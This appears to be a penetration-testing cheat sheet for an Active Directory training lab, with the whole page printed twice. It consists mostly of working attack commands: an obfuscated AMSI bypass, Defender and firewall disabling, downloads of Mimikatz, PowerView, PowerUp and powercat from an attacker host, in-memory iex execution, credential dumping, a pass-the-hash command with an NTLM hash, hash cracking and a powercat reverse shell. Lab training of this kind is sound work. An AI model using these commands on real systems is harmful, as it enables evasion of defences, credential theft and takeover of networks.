New Server

Bypass AMSI:

powershell -ep bypass

SET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
. .\PowerView.ps1
Get-NetUser

Disable Firewall

#check status of Microsoft Defender
Get-MpComputerStatus


#Disable Firewall
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"

#Disable Antivirus
Set-MpPreference -DisableRealtimeMonitoring $true


#Exclude file type
Set-MpPreference -ExclusionExtension EXTENSION


#Exclude locations
Set-MpPreference -ExclusionPath PATH\TO\FOLDER

Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess


#How to delete active threat on Microsoft Defender
Remove-MpThreat

Downloading scripts

Invoke-WebRequest http://172.16.100.29/Invoke-Mimikatz.ps1 -OutFile C:\Invoke-Mimikatz.ps1
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Invoke-WebRequest http://172.16.100.29/PowerUp.ps1 -OutFile C:\PowerUp.ps1
Invoke-WebRequest http://172.16.100.29/powercat.ps1 -OutFile C:\powercat.ps1

Enumerate user

Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Import-Module C:\powerview.ps1



#Get a list of users in the current domain
Get-NetUser
Get-NetUser -Username student1


#Get list of all properties for users in the current domain
Get-UserProperty
Get-UserProperty –Properties pwdlastset
Get-UserProperty –Properties badpwdcount


#Find where you have localadminacces
Find-LocalAdminAccess

#Search for a particular string in a user's attributes:
Find-UserField -SearchField Description -SearchTerm "pass"


#Get the group membership for a user:
Get-NetGroup –UserName "student1"


#Tools
Find-WMILocalAdminAccess.ps1 
FindPSRemotingLocalAdminAccess.ps1


#Find local admins on all machines of the domain 
#(needs administrator privs on non-dc machines).
Invoke-EnumerateLocalAdmin –Verbose


#Find computers where a domain admin (or specified user/group) has sessions:
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"


#To confirm admin access
Invoke-UserHunter -CheckAccess


Find computers where a domain admin is logged-in.
Invoke-UserHunter -Stealth

access to other servers? for remote command via powershell

Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1


Get-NetComputer
Get-NetComputer –OperatingSystem "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData


#Find where you have localadminacces
Find-LocalAdminAccess


#Find all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess –Verbose


#Tools
Find-WMILocalAdminAccess.ps1 
FindPSRemotingLocalAdminAccess.ps1


#Find local admins on all machines of the domain 
#(needs administrator privs on non-dc machines).
Invoke-EnumerateLocalAdmin –Verbose


#Find computers where a domain admin (or specified user/group) has sessions:
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"


#To confirm admin access
Invoke-UserHunter -CheckAccess


Find computers where a domain admin is logged-in.
Invoke-UserHunter -Stealth

Process running

Get Hashes and move Lateral

Invoke-WebRequest http://172.16.100.29/Invoke-Mimikatz.ps1 -OutFile C:\Invoke-Mimikatz.ps1
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Import-Module C:\powerview.ps1
Import-Module C:\Invoke-Mimikatz.ps1
#Find where you have localadminacces
Find-LocalAdminAccess –Verbose
#Tools
Find-WMILocalAdminAccess.ps1 
FindPSRemotingLocalAdminAccess.ps1
#Step One: Find where wher are logged in:
Invoke-UserHunter

#Step Two: check if we have Admin access:
Invoke-UserHunter -CheckAccess


#Step Three: Check if we execute command:
Invoke-Command -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local -ScriptBlock{whoami;hostname;whoami /priv}


#Step Four: Create a Session:
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
$sess

#Step Five: Invoke-Mimikatz in memory to get NTLM (You need to be hosting ps1 with HS1):
iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1)
or
iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1 -UseBasicParsing) 


#Step Six: Disable AV and Firewall
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess


#Step Eight: Invoke-Mimikatz from memory:
Invoke-Command -ScriptBlock ${function:Invoke-mimikatz} -Session $sess
then exit the remote connection --IMPORTANT


#Step Nine: Over the Pass Hash
#Open PowerShell Admin from Local Computer
#Disable AV
Set-MpPreference -DisableRealtimeMonitoring $true
#Import-Mimikatz
Import-Module .\Invoke-Mimikatz.ps1
#Perform Over the Hash attack:
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"


#Step Ten: It opens a new PowerShell with the svcadmin token
#Therefore, you can connect to the server where the account has a connection
whoami
Invoke-command -ScriptBlock{whoami;hostname} -Computer dcorp-dc.dollarcorp.moneycorp.local


Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -Computername


Over pass the hash" generate tokens from hashes.
Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"


#Crack Hash
john --format=nt hash


#Download for Windows
https://www.techspot.com/downloads/6970-john-the-ripper.html

Jenkins Revershell

powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.29/powercat.ps1')); powercat -c 172.16.100.29 -p 443 -ep; 
powercat -l -v -p 443 -t 1064

priv sca

Invoke-WebRequest http://172.16.100.29/PowerUp.ps1 -OutFile C:\PowerUp.ps1
Import-Module .\PowerUp.ps1
Invoke-AllChecks

Downloading scripts

Invoke-WebRequest http://172.16.100.29/powercat.ps1 -OutFile C:\Downloads\powercat.ps1

PreviousX. Defenses and Bypass – PowerShell NextMove Lat-AppLocker

Last updated 4 years ago

Was this helpful?

New Server

Bypass AMSI:

powershell -ep bypass

SET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
. .\PowerView.ps1
Get-NetUser

Disable Firewall

#check status of Microsoft Defender
Get-MpComputerStatus


#Disable Firewall
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"

#Disable Antivirus
Set-MpPreference -DisableRealtimeMonitoring $true


#Exclude file type
Set-MpPreference -ExclusionExtension EXTENSION


#Exclude locations
Set-MpPreference -ExclusionPath PATH\TO\FOLDER

Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess


#How to delete active threat on Microsoft Defender
Remove-MpThreat

Downloading scripts

Invoke-WebRequest http://172.16.100.29/Invoke-Mimikatz.ps1 -OutFile C:\Invoke-Mimikatz.ps1
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Invoke-WebRequest http://172.16.100.29/PowerUp.ps1 -OutFile C:\PowerUp.ps1
Invoke-WebRequest http://172.16.100.29/powercat.ps1 -OutFile C:\powercat.ps1

Enumerate user

Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Import-Module C:\powerview.ps1



#Get a list of users in the current domain
Get-NetUser
Get-NetUser -Username student1


#Get list of all properties for users in the current domain
Get-UserProperty
Get-UserProperty –Properties pwdlastset
Get-UserProperty –Properties badpwdcount


#Find where you have localadminacces
Find-LocalAdminAccess

#Search for a particular string in a user's attributes:
Find-UserField -SearchField Description -SearchTerm "pass"


#Get the group membership for a user:
Get-NetGroup –UserName "student1"


#Tools
Find-WMILocalAdminAccess.ps1 
FindPSRemotingLocalAdminAccess.ps1


#Find local admins on all machines of the domain 
#(needs administrator privs on non-dc machines).
Invoke-EnumerateLocalAdmin –Verbose


#Find computers where a domain admin (or specified user/group) has sessions:
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"


#To confirm admin access
Invoke-UserHunter -CheckAccess


Find computers where a domain admin is logged-in.
Invoke-UserHunter -Stealth

access to other servers? for remote command via powershell

Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1


Get-NetComputer
Get-NetComputer –OperatingSystem "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData


#Find where you have localadminacces
Find-LocalAdminAccess


#Find all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess –Verbose


#Tools
Find-WMILocalAdminAccess.ps1 
FindPSRemotingLocalAdminAccess.ps1


#Find local admins on all machines of the domain 
#(needs administrator privs on non-dc machines).
Invoke-EnumerateLocalAdmin –Verbose


#Find computers where a domain admin (or specified user/group) has sessions:
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"


#To confirm admin access
Invoke-UserHunter -CheckAccess


Find computers where a domain admin is logged-in.
Invoke-UserHunter -Stealth

Process running

Get Hashes and move Lateral

Invoke-WebRequest http://172.16.100.29/Invoke-Mimikatz.ps1 -OutFile C:\Invoke-Mimikatz.ps1
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Import-Module C:\powerview.ps1
Import-Module C:\Invoke-Mimikatz.ps1
#Find where you have localadminacces
Find-LocalAdminAccess –Verbose
#Tools
Find-WMILocalAdminAccess.ps1 
FindPSRemotingLocalAdminAccess.ps1
#Step One: Find where wher are logged in:
Invoke-UserHunter

#Step Two: check if we have Admin access:
Invoke-UserHunter -CheckAccess


#Step Three: Check if we execute command:
Invoke-Command -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local -ScriptBlock{whoami;hostname;whoami /priv}


#Step Four: Create a Session:
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
$sess

#Step Five: Invoke-Mimikatz in memory to get NTLM (You need to be hosting ps1 with HS1):
iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1)
or
iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1 -UseBasicParsing) 


#Step Six: Disable AV and Firewall
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess


#Step Eight: Invoke-Mimikatz from memory:
Invoke-Command -ScriptBlock ${function:Invoke-mimikatz} -Session $sess
then exit the remote connection --IMPORTANT


#Step Nine: Over the Pass Hash
#Open PowerShell Admin from Local Computer
#Disable AV
Set-MpPreference -DisableRealtimeMonitoring $true
#Import-Mimikatz
Import-Module .\Invoke-Mimikatz.ps1
#Perform Over the Hash attack:
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"


#Step Ten: It opens a new PowerShell with the svcadmin token
#Therefore, you can connect to the server where the account has a connection
whoami
Invoke-command -ScriptBlock{whoami;hostname} -Computer dcorp-dc.dollarcorp.moneycorp.local


Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -Computername


Over pass the hash" generate tokens from hashes.
Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"


#Crack Hash
john --format=nt hash


#Download for Windows
https://www.techspot.com/downloads/6970-john-the-ripper.html

Jenkins Revershell

powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.29/powercat.ps1')); powercat -c 172.16.100.29 -p 443 -ep; 
powercat -l -v -p 443 -t 1064

priv sca

Invoke-WebRequest http://172.16.100.29/PowerUp.ps1 -OutFile C:\PowerUp.ps1
Import-Module .\PowerUp.ps1
Invoke-AllChecks

Downloading scripts

Invoke-WebRequest http://172.16.100.29/powercat.ps1 -OutFile C:\Downloads\powercat.ps1

PreviousX. Defenses and Bypass – PowerShell NextMove Lat-AppLocker

Last updated 4 years ago

Was this helpful?